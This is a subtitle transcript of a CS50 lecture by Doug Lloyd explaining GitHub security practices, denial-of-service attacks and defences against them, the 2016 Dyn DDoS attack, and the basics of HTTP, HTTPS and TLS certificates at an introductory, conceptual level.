Placeholder Image

Subtitles section Play video

  • DOUG LLOYD: Now that we know a bit more about the internet and how it works,

  • let's reintroduce the subject of security with this new context.

  • And let's start by talking about Git and GitHub.

  • Recall that Git and GitHub are a technology that

  • are used by programmers to version control

  • their software, which basically allows them the ability

  • to save code to an internet-based repository in case of some failure

  • locally, they have a backup place to put it, but also

  • keep track of all the changes they've made

  • and possibly go back in time in case they produce

  • a version of code that is broken.

  • GitHub has some great advantages, but it also

  • has the potential disadvantages because of this structure

  • of being able to go back in time.

  • So for example, imagine that what we have is an initial commit, and commit

  • is just GitHub parlance for a set of code

  • that you are sending to the internet.

  • So I've decided to take file A, file B, and file C in their current versions.

  • I've saved them using control S or command S literally on my machine,

  • and I want to send those versions to GitHub to be

  • stored permanently or semi-permanently.

  • You would package those up in what's called a commit

  • and then push that code to GitHub where it would then be visible online.

  • And this would be packaged as a commit.

  • And all the files that we view on GitHub are tracked in terms of commits.

  • And commits chain together.

  • And we've seen this idea of chaining in the past when we've

  • discussed linked lists, for example.

  • So every commit knows about the one that comes after it once

  • that commit is eventually pushed as well as all of the ones that preceded it.

  • So imagine we have an initial comment where we post some code

  • and then we write some more-- we make some more changes.

  • We perhaps update our database in such a way

  • where when we post or push-- excuse me-- our second commit to GitHub,

  • we accidentally expose the database credentials.

  • So perhaps someone inadvertently typed the password

  • for how to access the database into some Python code that would then

  • be used to access that database.

  • That's not a good thing.

  • And maybe somebody quickly realized it and said, you know what?

  • We need to get this off of GitHub.

  • It is a source repository.

  • It's available online.

  • And so they push a third commit to GitHub that deletes those credentials.

  • It stores them somewhere else that's not going to be saved on this repository.

  • But have we actually solved the problem?

  • And you can probably imagine that the answer

  • is no, because we have this idea of version control

  • where every past iteration of all of these files

  • is stored still on GitHub such that, if I needed to, I could go back in time.

  • So even though I attempted to solve the security crisis I just

  • created for myself by introducing a new commit that

  • removes the credentials from those files such that,

  • if I'm looking just at the most recent version of the files,

  • I don't see it anymore.

  • I still have the ability to go back in time,

  • so this doesn't actually solve a problem.

  • See, one of the interesting things about GitHub

  • is the model that is used for it.

  • At the very beginning of GitHub's existence,

  • it relied pretty extensively on this idea of you sign up for free,

  • you get a free account for GitHub, and you

  • have a limited number of private repositories, repositories that are not

  • publicly viewable or searchable, and you could pay to have more of them

  • if you wanted to.

  • But the majority of your repositories, assuming

  • you did not opt into a paid account, were free, which

  • meant anybody on the internet could search them using GitHub's search tool,

  • or using even a regular search engine such as Google,

  • could just look for something.

  • And if your GitHub repositories happen to match what that person searched

  • or specifically, if you're looking within GitHub search feature,

  • if a user is looking for specific lines of code,

  • anything in a public repository, it is available.

  • Now, GitHub has recently changed to a model where

  • there are more private repo-- or there's a higher limit

  • on the number of private repositories that somebody could have.

  • But this was part of Github's design to really encourage

  • developers and programmers to sort of create this open source community where

  • anybody could view someone else's code, and in GitHub parlance,

  • fork their code, which basically means to take their entire repository

  • or collection of files and copy it into their own GitHub repository

  • to perhaps make changes or suggest changes,

  • pushing those back into the code base with the idea being

  • that it would make the entire community better.

  • A side effect, of course, is that items get

  • revealed when we do so because of this public repository setup we have here.

  • So GitHub is great in terms of its ability for programmers

  • to refer to materials on the internet.

  • They don't have to rely on their own local machines to store code.

  • It allows people to work from multiple workstations,

  • similar to how Dropbox or Google Drive, for example,

  • might allow you to access files from different machines.

  • You don't have to be on a specific machine to access a file,

  • as we used to have to do before these cloud-based document storage

  • services existed.

  • And it encourages collaboration.

  • For example, if you and I were to collaborate on a GitHub repository,

  • I could push changes to that repository that you could then pull.

  • And we could then be working off of the same code base again.

  • We sort of have this central repo--

  • central area where we share our code with one another.

  • And we can each individually make changes

  • and incorporate one another's changes into the final products.

  • So we're always working off of the same base of material.

  • The side effect, though, again, is this material

  • is generally public unless you have opted into a private repository where

  • you have specific individuals who are logged

  • in with their GitHub accounts who want to share.

  • So is there a way to solve this problem, though, of we

  • accidentally expose our credentials in a public repository?

  • Of course, if we're in a private repository,

  • this might not be as alarming.

  • It's still probably not something you--

  • it should be encouraged to have credentials

  • for anything stored anywhere, whether public or private, on the internet.

  • It's a little riskier.

  • But is there a way to get rid of this or to prevent this problem from happening?

  • And fortunately, there are a number of different safeguards

  • specific to Git and GitHub that we can use

  • to prevent the accidental leakage of information, so to speak.

  • So for example, one way we can handle this is using a program or utility

  • called GitSecrets.

  • GitSecrets works by looking for what's called a regular expression.

  • And a regular expression is computer science parlance

  • for a particular formation of a string, so a certain number

  • of characters, a certain number of digit characters, maybe some punctuation

  • marks.

  • You can say, I'm looking for strings that match this idea.

  • And you can express this idea where this idea is all capital

  • letters, all lowercase letters, this many numbers, and this many punctuation

  • marks, and so on using this tool called a regular expression.

  • But GitSecrets contains a list of these regular expressions

  • and will warn you when you are about to make a commit, when you're

  • about to push code or send code to GitHub to be stored

  • in its online repository that you have a string that matches this pattern

  • that you wanted me to warn you about.

  • And so be sure before you commit this code

  • and push this code that you actually intend to send this up

  • to GitHub, because it may be that this matches a password string that you're

  • trying to avoid.

  • So that's an interesting tool that can be used for that.

  • You also want to consider limiting third party app access.

  • GitHub accounts are actually very common to use as other forms of login,

  • for example.

  • So there's a platform on the internet called

  • OAuth which allows you to use, for example, your Facebook

  • account or your Google account to log into other services.

  • Perhaps you've encountered this in your own experience working

  • with different services on the internet.

  • Instead of creating a login for site x, you could use your Facebook or Google

  • login, or, in many instances as well, your GitHub log in to do so.

  • When you do so, though, you are allowing that third party application,

  • someone that's not GitHub, the ability to use and access your GitHub identity

  • or credential.

  • And so you should be very careful with not only GitHub but other services

  • as well, thinking about whether you want that other service to have access

  • to your GitHub, or Facebook, or Google account information to use it even just

  • for authentication.

  • It's a good idea to try and limit how much third party app

  • access you're giving to other services.

  • Another tool is to use something called a commit hook.

  • Now, commit hook is just a fancy term for a short program

  • or set of instructions that executes when a commit is pushed to GitHub.

  • So for example, many of the course websites

  • that we use here at Harvard for CS50 are GitHub-based,

  • which means that when we want to change the content on the course website,

  • we update some HTML, or Python, or JavaScript files, we push those

  • to GitHub, and that triggers a commit hook where basically that commit

  • hook copies those files into our web server,

  • runs some tests on them to make sure that there's no errors in them.

  • For example, if we wrote some JavaScript or Python that was breaking,

  • it had a bug in it, we'd rather not deploy that bug so to speak.

  • We wouldn't want the broken version of the code

  • to replace the currently working website.

  • And so commit hook can be used to do testing as well.

  • And then once all the tests pass, we then

  • are able to activate those files on the web server

  • and the changes have happened.

  • So we're using GitHub to store the changes

  • that we want to make on our site, the HTML, the Python,

  • the JavaScript changes that we want to make.

  • And then we're using this commit hook, a set of instructions,

  • to copy them over and actually deploy those changes to the website

  • once we've verified that we haven't made anything break.

  • You can also use commit hooks, for example, to check for passwords

  • and have it warn you if you have perhaps leaked a credential.

  • And then you can undo that with a technique

  • that we'll see in just a moment.

  • Another thing that you can do when using GitHub to protect or verify

  • your identity is to use an SSH key.

  • SSH keys are a special form of a public and private key.

  • In this case, it's really not used for encryption, though.

  • It's actually used as identification.

  • And so this idea of digital signatures, which

  • you may recall from a few lectures ago, comes back into play.

  • Whenever I use an SSH key to push my code to GitHub, what happens

  • is I also digitally sign the commit when I send it up.

  • And so before that commit gets posted to GitHub,

  • GitHub verifies this by checking my public key

  • and verifying, using the mathematics that we've seen in the past,

  • that, yes, only Doug could have sent this to me

  • because only Doug's public key will unscramble this set of zeros and ones

  • that I received that only could have then been created by his private key.

  • These two things are reciprocal of one another.

  • So we can use SSH keys and digital signatures

  • as an identity verification scheme as well for GitHub

  • as we might be able to for mailing documents, or sending

  • documents, or something like that.

  • Now, imagine we have posted the credentials accidentally.

  • Is there a way to get rid of them?

  • GitHub does track our entire history.

  • But what if we do make a mistake?

  • Human beings are fallible.

  • And so there is a way to actually eliminate the history.

  • And that is using a command called Git Rebase.

  • So let's go back to the illustration we had a moment ago where

  • we have several different commits.

  • And I've added a fourth commit here just for purposes of illustration.

  • So our first commit and our second commit,

  • and then it's after that that we expose the credentials accidentally,

  • and then we have a fourth commit where we actually delete that mistake that we

  • had previously made.

  • When we want to Git Rebase, the idea is we want

  • to delete a portion of the history.

  • Now, deleting a portion of the history has

  • a side effect of any changes that I made here or here.

  • In this illustration, we're going to get rid of the last two commits.

  • Any changes that I've made besides accidentally exposing the credentials

  • are also going to be destroyed.

  • And so it's going to be incumbent on us to make sure to copy and save

  • the changes we actually want to preserve in case we've done more than just

  • expose the credentials.

  • And then we'll have to make a new commit in this new history

  • we create so that we can still preserve those changes that we want to make.

  • But let's say, other than the credentials,

  • I didn't actually do anything else.

  • One thing I could do is rebase or set as a new start point, basically,

  • this second commit as the end of the chain.

  • So instead of going all the way to here and having that preserved ad infinitum,

  • I want to just get rid of everything from the second commit forward.

  • And I can do that.

  • And then those commits are no longer remembered by GitHub.

  • And as soon as the next commit I have would go here,

  • right after second commit as opposed to imagining a fifth one there

  • right after credentials being removed, those commits

  • are, for all intents and purposes on GitHub, forgotten.

  • And finally, one more thing that we can do when using GitHub

  • is to mandate the use of two-factor authentication.

  • Recall we've discussed two-factor authentication a little bit previously.

  • And the idea is that you have a backup mechanism

  • to prevent unauthorized login.

  • And the two factors in two-factor authentication

  • are not two passwords, because those are fundamentally quite similar.

  • The idea is that you want to have something that you know, for example,

  • a password-- that's usually very commonly one of the two factors

  • in two-factor authentication--

  • and something that you have, the thought being

  • that an adversary is incredibly unlikely to have both things at the same time.

  • They may know your password, but they probably

  • don't have your cell phone, for example, or your RSA key.

  • They may have stolen your phone or they may have stolen your RSA key,

  • but they probably don't also know your password.

  • And so the idea is that this provides an additional level of defense

  • against potential hacking, or breaking into accounts,

  • or unauthorized behavior in accounts that you obviously

  • don't want to happen.

  • Now, an RSA key, if you're unfamiliar, is something that looks like this.

  • There's different versions of them.

  • They've sort of evolved over time.

  • This one is actually a combined RSA key and USB drive.

  • And inside the window here of the RSA key

  • is a six digit number that just changes every 60 seconds or so.

  • So when you are given one of these, for example,

  • perhaps at a firm or a business, it is assigned to you specifically.

  • There's a server that your IT team will have

  • setup that maps the serial number on the back of this RSA key

  • to your employee ID, for example.

  • But they otherwise don't know what the number currently on the RSA key is.

  • They only know who owns it, who is physically in possession of it, which

  • employee ID it maps do.

  • And every 60 seconds it changes according

  • to some mathematical algorithm that is built into the key that generates

  • numbers in a pseudo random way.

  • And after 60 seconds, that code will change into something else.

  • And you'll need to actually have the key on you to complete a login.

  • If an RSA key is being used to secure such

  • that you need to enter a password and your RSA key value,

  • you would need to have both.

  • No other employee RSA key-- well, hypothetically, I

  • guess there's a one in a million chance that it

  • would happen to be randomly showing the same number at the same time.

  • But no other employee's RSA key could be used to log in.

  • Only yours could be used to log in.

  • Now, there are several different tools out there

  • that can be used to provide two-factor authentication services.

  • And there's really no technical reason not to use these services.

  • You'll find them as applications on cell phones, most likely.

  • And you'll find ones like this, Google Authenticator, Authy, Duo Mobile.

  • There are lots of others.

  • And if you don't want to use one of those applications specifically,

  • many services also just allow you to receive a text message

  • from the service itself.

  • And you'll just get that via SMS on your phone,

  • so still on your phone, just not tied to a specific application.

  • And while there's no technical reason to avoid two-factor authentication,

  • there is sort of this social friction surrounding

  • two-factor authentication in that human beings tend to find it annoying, right?

  • It used to be username, password, you're logged in.

  • It's pretty quick.

  • Now it's username, password, you get brought to another screen,

  • you're asked to enter a six-digit code, or maybe in some advanced applications

  • you get a push notification sent to your device that you have to unlock

  • and then hit OK on the device.

  • And people just find that inconvenient.

  • We haven't yet reached this point culturally

  • where two-factor authentication is the norm.

  • And so it's sort of a linchpin when we talk about security

  • in the internet context, is human beings being the limiting factor

  • for how secure we can be.

  • We have the technology to take steps to protect ourselves,

  • but we don't feel compelled to do so.

  • And we'll see this pattern reemerge in a few other places today.

  • But just know that that is why perhaps you're

  • not seeing so much adoption of two-factor authentication.

  • It's not that it's technically infeasible to do so.

  • It's just that we just find it annoying to do so,

  • and so we don't adopt it as aggressively as perhaps we should.

  • Now let's discuss the type of attack that

  • occurs on the internet with unfortunate regularity,

  • and that is the idea of a denial of service attack.

  • Now, the idea behind these attacks is basically

  • to cripple the infrastructure of a website.

  • Now, the reason for this might be financial.

  • You want to try and sabotage somebody.

  • There might be other motivations, distraction, for example,

  • by tying up their resources, trying to stop the attack.

  • It opens up another avenue to do something else,

  • to perhaps steal information.

  • There's many different motivations for why they do this.

  • And some of them are honestly just boredom or fun.

  • Amateur hackers sometimes think it's fun to just initiate

  • a denial of service attack against an entity that

  • is not prepared to handle it.

  • Now, in the associated materials for this course,

  • we provided an article called Making Cyberspace Safe for Democracy, which

  • we really do encourage you to take a look at, read,

  • and discuss with your group.

  • But I also want to take a little bit of time right

  • now just to talk about this article in particular

  • and draw your attention to some areas of concern

  • or some areas that might lead to more discussion.

  • Now, the biggest of these is these attacks

  • tend not to be taken very seriously by people when they hear about them.

  • You'll occasionally hear about these attacks in the news,

  • denial of service attacks, or their cousin,

  • distributed denial of service attacks.

  • But culturally, again, us being humans and sort

  • of neglecting some of the real security concerns here,

  • we don't think of it as an attack.

  • And that's maybe because of how we hear about other kinds of attacks

  • on the news that seem more physically devastating,

  • that have more real consequences.

  • And it makes it hard to have a serious conversation about cyber attacks

  • because there's this friction that we face trying to get people to understand

  • that these are meaningful and real.

  • And in particular, these attacks are kind of insidious.

  • They're really easy to execute without much difficulty at all,

  • especially against a small business that might be running its own server as

  • opposed to relying on a cloud service.

  • A pretty top-of-the-line, commercially available machine might be able

  • to execute a denial of service or DoS attack on its own.

  • It doesn't even require exceptional resources.

  • Now, when we start to attack mid-sized companies, or larger companies

  • or entities, one single computer from one single IP address

  • is not typically going to be enough.

  • And so instead, you would have a distributed denial of service attack.

  • In a distributed denial of service attack,

  • there is still generally one core hacker, or one collective group

  • of hackers or adversaries that are trying

  • to penetrate some company's defenses.

  • But they can't do it with their own machine.

  • And so what they do is create something called a botnet.

  • Perhaps you've heard this term before.

  • A botnet basically happens, or is created,

  • when hackers or adversaries distribute worms or viruses sort of

  • surreptitiously.

  • Perhaps they packaged them into some download.

  • People don't notice anything about the worm or anything

  • about this program that has been covertly installed on their machine.

  • It doesn't do anything in particular until it is activated.

  • And then it becomes an agent or a zombie--

  • sometimes you'll hear it termed that as well--

  • controlled by the hackers.

  • And so all of a sudden the adversaries gain

  • control of many different devices, hundreds or thousands

  • or tens of thousands, or even more in some of the bigger attacks

  • that have happened, basically turning these computers--

  • rendering all of them under their control

  • and being able to direct them to take whatever action they want.

  • And in particular, in the case of a distributed denial of service attack,

  • all of these computers are going to make web requests

  • to the same server or same website, because that's the idea.

  • You have so many requests.

  • With distributed denial of service attacks

  • or just regular denial of service attacks, it's just a question of scale,

  • really.

  • We're hitting those servers with so many web requests.

  • I want to access this.

  • I want to access this, hundreds, thousands, tens of thousands

  • of these requests a second such that the computer can't possibly-- the server

  • can't possibly field all of these inquiries

  • that are coming and trying to give these requests the data they're asking for.

  • Ultimately, that would eventually, after enough time,

  • result in the server just crashing, throwing up its hands and saying,

  • I don't know what to do.

  • I can't possibly process all of these requests.

  • But by tying it up in this way, the adversary

  • has succeeded in damaging the infrastructure of the server.

  • It's either denied the server the ability to process customers

  • and payments or it's just taken down the entire website

  • so there's no information available about the company anymore to anybody

  • who's trying to look it up.

  • These attacks are actually really, really common.

  • There are some surveys that have been out that

  • assess that roughly one sixth to one third of average-sized businesses that

  • are part of this tech survey that goes out every year

  • suffer some sort of DoS attack in a given year, so 16% to 35% or so

  • of business, which is a lot of businesses when you think about it.

  • And these attacks are usually quite small,

  • and they're certainly not newsworthy.

  • They might last a few minutes.

  • They might last a few hours.

  • But they're enough to be disruptive.

  • They're certainly noteworthy.

  • And they're something to avoid if it's possible.

  • Cloud computing has made this problem kind of worse.

  • And the reason for this is that, in a cloud computing context,

  • your server that is running your business

  • is not physically located on your premises.

  • It was often the case that when a business would run a website

  • or would run their business, they would have a server room that

  • had the software that was necessary to run their website

  • or to run whatever software-based services they provided.

  • And it was all local to that business.

  • No one else could possibly be affected.

  • But in a cloud computing context, we are generally

  • renting server space and server power from an entity such as Amazon Web

  • Services, or Google Cloud Services, or some other large provider where

  • it might be that 10, 20, 50, depending on the size of the business in question

  • here--

  • multiple businesses are sharing the same physical resources,

  • and they're sharing the same server space,

  • such that if any one of those 50, let's say,

  • businesses is targeted by hackers or adversaries

  • for a denial of service attack, that might actually, as collateral damage,

  • take out the other 49 businesses.

  • They weren't even part of the attack.

  • But cloud computing is--

  • we've heard about it as it's a great thing.

  • It allows us to scale out our websites, make it

  • so that we can handle more customers.

  • It takes away the problem of security, web-based security,

  • because we're outsourcing that to the cloud provider to give that to us.

  • But it now introduces this new problem of, if we're all sharing the resources

  • and any one of us gets attacked, then all of us

  • lose the ability to access those resources and use them,

  • which might cause all of our organizations to suffer

  • the consequences of one single attack.

  • This collateral damage can get even worse

  • when you think about servers that are--

  • or businesses whose service is providing the internet, OK?

  • So a very common example of this, or a noteworthy example

  • of this, happened in 2016 with a service called

  • DYN, D-Y-N. DYN is a DNS service provider,

  • DNS being the domain name system.

  • And the idea there is to map the things like www.google.com to its IP address.

  • Because in order to actually access anything on the internet

  • or to have a communication with anyone, you need to know their IP address.

  • And as human beings, we tend not to actually remember

  • what some website's IP address is, much like we may not recall a certain phone

  • number.

  • But if it has a mnemonic attached to it-- so for example,

  • you know back in the day we had 1-800-COLLECT for collect calls.

  • If you forgot the number, the literal digits of that phone number,

  • you could still remember the idea of it because you had this mnemonic device

  • to help remind you.

  • Domain names, www.whatever.com, are just mnemonic devices

  • that we use to refer to an IP address.

  • And DNS servers provide this service to us.

  • DYN is one of the major DNS providers for the internet overall.

  • And if a denial of service attack, or in this case

  • it was certainly a distributed denial of service attack because it was enormous,

  • goes after pinging the IP address or hitting that server over

  • and over and over, then it is unable to field requests from anyone else,

  • because it's just getting pummeled by all of these requests from some botnet

  • that some adversary or collective of adversaries has taken control of.

  • This, the collateral damage, is no one can ever

  • map a domain name to an IP address, which

  • means no one can visit any of these websites

  • unless you happen to know at the outset what the IP address of any given

  • website was.

  • If you knew the IP address, this wasn't a problem.

  • You could just still directly go to that IP address.

  • That's not the kind of attack here.

  • But the attack instead tied up the ability

  • to translate these mnemonic names into numbers.

  • And as you can see, DYN was a DNS-- or is

  • a DNS provider for much of the eastern half of the United States

  • as well as the Pacific Northwest and California.

  • And if you think about what kinds of businesses

  • are headquartered in the Pacific Northwest

  • and in California and in the New York area, for example,

  • you probably see that some major, major services,

  • including GitHub, which we've already talked about today,

  • but also Facebook and others--

  • Harvard University's website was also taken down for several hours.

  • This attack lasted about 10 hours, so quite prolonged.

  • It really did a lot of damage on that day.

  • It really crippled the ability of people to use the internet

  • for a long period of time, so kind of very interesting.

  • This article also talks a bit about how the United States government has

  • decided to-- or legislature--

  • handle these kinds of issues, computer-based attacks.

  • It takes take a look at the Computer Fraud and Abuse

  • Act, which is codified at 18 USC 1030.

  • And this is really the only computer crimes, general computer crimes,

  • law that is on the books and talks about what

  • it means to be a protected computer.

  • And you'll be interested to know perhaps that any computer pretty much is

  • a protected computer.

  • The law specifically calls out government computers as well as

  • any computer that may be involved in interstate commerce,

  • which is you can imagine anybody who uses the internet,

  • their computer then falls under the ambit of this act.

  • So it's another interesting thing to take a look

  • at if you're interested in how we deal with processing or prosecuting

  • violations of computer-based crimes.

  • All of it is actually sort of dealt with in the Computer Fraud and Abuse

  • Act, which is not terribly long and hasn't been updated extensively

  • since the 1980s other than some small amendments.

  • So it's kind of interesting that we have not yet

  • gotten to the point where we are defining and prosecuting

  • specific types of computer crime, even though we've begun to figure out

  • different types of computer crimes, such as DoS attacks, such as phishing,

  • and so on.

  • Now, hypothetically, a simple denial of service attack

  • should be pretty easy to stop.

  • And the reason for that is that there's only one person making the attack.

  • All requests, recall, that happen over the internet happen via HTTP.

  • And HTTP requires that the sender's IP address

  • be part of that envelope that gets sent over,

  • such that the server who wants to respond to the client, or the sender,

  • can just reference.

  • It's the return address.

  • You need to be able to know where to send the data back to.

  • And so any request that is coming from--

  • there are thousands of requests that might

  • be coming from a single IP address.

  • If you see that happening, you can just decide as a server in the software

  • to stop accepting requests from that address.

  • DDoS attacks, distributed denial of service attacks,

  • are much harder to stop.

  • And it's exactly because of the fact that there is not a single source.

  • If there's a single source, again, we would just completely

  • stop accepting any requests of any type from that computer.

  • However, because we have so many different computers to contend with,

  • the options to handle this are a bit more limited.

  • There are some techniques for averting them or stopping them

  • once they are detected, however, the first of which is firewalling.

  • So the idea of a firewall is we are only going

  • to allow requests of a certain type.

  • We're going to allow them from any IP address,

  • but we're only going to accept them into this port.

  • Recall that TCPIP gives us the ability to say this service

  • comes in via this port, so HTTP requests come in by a port 80.

  • HTTPS requests come in via port 443.

  • So imagine a distributed denial of service attack

  • where typically the site would expect to be receiving requests on HTTPS.

  • It generally only uses secured HTTP in order

  • to process whatever requests are coming in.

  • So it's expecting to receive a lot of traffic on port 443.

  • And then all of a sudden a distributed denial of service attack

  • begins and it's receiving lots of requests on port 80.

  • One way to stop that attack before it starts to tie up resources

  • is to just put a firewall up and say, I'm

  • not actually going to accept any requests on port 80.

  • And this may have a side effect of denying certain legitimate requests

  • from getting through.

  • But since the vast majority of the traffic that I receive on the site

  • comes in via HTTPS on port 443, that's a small price to pay.

  • I'd rather just allow the legitimate requests to come in.

  • So that's one technique.

  • Another technique is something called sinkholing.

  • And it's exactly what you probably think it is.

  • So a sinkhole, as you probably know, is a hole

  • in the ground that swallows everything up.

  • And a sink hole in digital context is a big black hole, basically, for data.

  • It's just going to swallow up every single request

  • and just not allow any of them out.

  • So this would, again, stop the denial of service attack

  • because it's just taking all the requests

  • and basically throwing them in the trash.

  • This won't take down the website of the company that's being attacked,

  • so that's a good thing.

  • But it's also not going to allow any legitimate traffic of any type

  • through, so that might be a bad thing.

  • But depending on the length of the attack, if it

  • seems like it's going to be short, if the requests trickle off

  • and stop because the attackers realize, we're not making any progress,

  • we're not actually doing--

  • we're not getting the results that we had hoped for,

  • then perhaps they would give up.

  • Then the sinkhole could be stopped and regular traffic

  • could start to flow through again.

  • So a sinkhole is basically just take all the traffic that comes in

  • and just throw it in the trash.

  • And then finally, another technique we could use

  • is something called packet analysis.

  • So again, HTTP we know is requests via the web.

  • And we learned a little bit that we have headers

  • that are packaged alongside those HTTP packets

  • where the request originated from, where it's going to.

  • There's a whole lot of other metadata as well.

  • You'll know, for example, what type of browser the individual is using

  • and what operating system perhaps they are using

  • and where, as in sort of a geographical generalization, are they.

  • Are they in the US Northeast?

  • Are they in South America and so on?

  • Instead of deciding to restrict traffic via specific ports

  • or just restrict all traffic, we could still allow all traffic to come in

  • but inspect all of the packets as they come in.

  • So for example, perhaps most of the traffic on our site we

  • are expecting to come from the--

  • just because I used that example already--

  • US Northeast.

  • And then all of a sudden we are experiencing

  • tons of packets coming in that have IP addresses that all seem to be based--

  • or they have, as part of their packets, information

  • that says that they're from South America,

  • or they're from the US West Coast, or somewhere else that we don't expect.

  • We can decide, after taking a quick look at that packet

  • and analyzing those individual headers, that I'm not

  • going to accept any packets from that location.

  • The ones that match locations I'm expecting, I'll let through.

  • And this, again, might prevent certain customers from getting through,

  • certain legitimate customers who might actually be based in South America

  • from getting through.

  • But in general, it's going to block most of the damaging traffic.

  • DDoS attacks are really frustrating for companies

  • because they really can do a lot of damage.

  • Usually the resources of the company will eventually-- especially

  • if they're cloud-based and they rely on their cloud provider to help them

  • scale up, usually the resources of the company being attacked

  • are enough to eventually overwhelm and stop

  • the attacker who usually has a much more limited set of resources.

  • But again, depending on the type of business being attacked in this way--

  • again, think of the example of DYN, the DNS provider.

  • The ramifications for one of these attacks

  • can be really quite severe and really quite annoying and costly

  • for a business that suffers it.

  • So we just talked about HTTP and HTTPSS a moment ago

  • when we were talking about firewalling, allowing

  • some traffic on some of the ports but not other ports,

  • so maybe allowing HTTP traffic but not HTTPS traffic.

  • Let's take a look at these two technologies in a bit more detail.

  • So HTTP, again, is the hypertext transfer protocol.

  • It is how hypertext or web pages are transmitted over the internet.

  • If I am a client and I make a request to you for some HTML content,

  • then you as a server would send a response back to me,

  • and then I would be able to see the page that I had requested.

  • And every HTTP request has a specific format at the beginning of it.

  • For example, we might see something like this, GET /execed HTTP/1.1, host:

  • law.harvard.edu.

  • Let's just quickly pick these apart again one more time.

  • If you see GET at the beginning of an HTTP request,

  • it means please fetch or get for me, literally, this page.

  • The page I'm requesting specifically is /execed.

  • And the host that I'm asking it from is, in this case, law.harvard.edu.

  • So basically what I'm saying here is please fetch for me,

  • or retreat from me, the HTML content that comprises

  • http://law.harvard.edu/execed.

  • And specifically I'm doing this using HTTP protocol version 1.1.

  • We're still using version 1.1 even though I

  • believe version 2.0 was defined almost 20 years ago now probably.

  • And basically this is just HTTP's way of identifying

  • how you're asking the question.

  • So it's similar to me making a request and saying, oh, by the way,

  • the rest of this request is written in French, or, oh, by the way,

  • the rest of this request is written in Spanish.

  • It's more like here are the parameters that you

  • should expect to see because this request is

  • in version 1.1, which differed non-trivially from version 1.0.

  • So it's just an identifier for how exactly we are formatting our request.

  • But HTTP is not encrypted.

  • And so if we think about making a request to a server,

  • if we're the client on the left and we're

  • making a request to a server on the right, it might go something like this.

  • Because the odds are pretty low that, if we're making a request,

  • we are so close to the server that would serve

  • that request to us that it wouldn't need to hop

  • through any routers along the way.

  • Remember, routers, their purpose in life is

  • to send traffic in the right direction.

  • And they contain a table of information that says,

  • oh, if I'm making a request to some server over there,

  • then the best path is to go here, and then I'll send it over there,

  • and then it will send it there.

  • Their job is to optimize and find the best path

  • to get the request to where it needs to be.

  • So if I'm initiating a request to, as the client, the server,

  • it's going to first go through router A who's

  • going to say, OK, I'm going to move it closer to the server

  • so that it receives that request, goes to router B, goes to router C.

  • And eventually router C perhaps is close enough to the server

  • that it can just hand off the request directly.

  • The server's then going to get that request, read it as HTTP/1.1,

  • look at all the other metadata inside of the request to see if there's anything

  • else that it's being asked for, and then it's going to send the information

  • back.

  • And in this example I'm having it go back

  • exactly through the same chain of routers but in reverse.

  • But in reality, that might be different.

  • It might not go through the exact same three

  • routers in this example in reverse.

  • It might actually go from C to A to B, back to A depending on traffic

  • that's happening on the network and how congested things are

  • and whether there might be a new path that is better in the amount of time

  • it took to process the request that I asked for.

  • But remember, HTTP, not secured.

  • Not encrypted.

  • This is plain, over-the-air communication.

  • We saw previously, when we took a look at a screenshot

  • from a tool called Wireshark, that it's not

  • that difficult on an unsecured network using an unsecured protocol to read,

  • literally, the contents of those packets going to and from.

  • So that's a vulnerability here for sure.

  • Another vulnerability is any one of these computers

  • along the way could be compromised.

  • So for example, router A perhaps was infected

  • by somebody who-- a router is just a computer as well.

  • So perhaps it was infected by an adversary

  • with some worm that will eventually make it part of some botnet,

  • and it'll eventually start spamming some server somewhere.

  • If router A is compromised in such a way that an adversary can just read all

  • the traffic that flows through it-- and again,

  • we're sending all of our traffic in an unencrypted fashion--

  • then we have another security loophole to deal with.

  • So HTTPS resolves this problem by securing or encrypting

  • all of the communications between a client and a server.

  • So HTTP requests go to one port.

  • We talked about that already.

  • They go to port 80 by convention.

  • HTTP requests go to port for 443 by convention.

  • In order for HTTPS to work, the server is

  • responsible for providing or possessing a valid what's called an SSL or TLS

  • certificate.

  • SSL is actually a deprecated technology now.

  • It's been subsumed into TLS.

  • But typically these things are still referred to as SSL certificates.

  • And perhaps you've seen a screen that looks like this when

  • you're trying to visit some website.

  • You get a warning that your connection is not private.

  • And at the very end of that warning, you are

  • informed that the cert date is invalid.

  • Basically this just means that their SSL certificate has expired.

  • Now, what is an SSL certificate?

  • So there are services that work alongside the internet called

  • certificate authorities.

  • And like GlobalSign, for example, from whom I borrowed the screenshots--

  • GoDaddy, who is also a very popular domain name provider,

  • is also a certificate authority.

  • And what they do is they verify that a particular website owns

  • a particular private key--

  • or excuse me, a particular public key which has a corresponding private key.

  • And the way they do that is they digitally

  • sign something to the certificate authority.

  • The certificate authority then goes through those exact same checks

  • that we've seen before for digital signatures

  • to verify that, yes, this person must own this public key.

  • And the idea for this is we're trusting that,

  • when I send a communication to you as the website

  • owner using the public key that you say is yours, then it really is yours.

  • There really is somebody out there or some third party

  • that we've decided to collectively trust, the certificate authority, who

  • is going to verify this.

  • Now, why does this matter?

  • Why do we need to verify that someone's public key is what they say it is?

  • Well, it turns out that this idea of asymmetric encryption,

  • or public and private key cryptography that we've previously discussed,

  • does form part of the core of HTTPS.

  • But as we'll see in a moment, we don't actually use public and private keys

  • to communicate except at the very, very beginning of our interaction

  • with some site when we are using HTTPS.

  • So the way this really happens underneath the hood

  • is via the secure sockets layer, SSL, which is now known as the transport

  • layer security overall protocol.

  • There's other things that are folded into it, but SSL is part of it.

  • And this is what happens.

  • When I am requesting a page from you, and you are the server,

  • and I am requesting this via HTTPS, I am going

  • to initially make a request using the public key that I believe

  • is yours because the certificate authority has

  • vouched for you, saying that I would like to make a encrypted request.

  • And I don't want to send that request over the air.

  • I don't want to send that in the clear.

  • I want to send it to you using the encryption that you say is yours.

  • So I send a request to you, encrypting it using your public key.

  • You receive the request.

  • You decrypt it using your private key.

  • You see, OK, I see now that Doug wants to initiate a request with me,

  • and you're going to fulfill the request.

  • But you're also going to do one other thing.

  • You're going to set a key.

  • And you're going to send me back a key, not

  • your public or private key, a different key, alongside the request that I made.

  • And you're going to send it back to me using my public key.

  • So the initial volley of communications back and forth between us

  • is the same as any other encrypted communication

  • using public and private keys that we've previously seen.

  • I send a message to you using your public key.

  • You decrypt it using your private key.

  • You respond to me using my public key, and I decrypt it using my private key.

  • But this is really slow.

  • If we're just having communications back and forth via mail or even via text,

  • the difference of a few milliseconds is immaterial.

  • We don't really notice it.

  • But on the web, we do notice it, especially

  • if we're making multiple requests or there's

  • multiple packets going back and forth and every single one of them

  • needs to be encrypted.

  • So beyond this initial volley, public and private key encryption

  • is no longer needed because it's no longer used, because it's too slow.

  • We would notice it if we did.

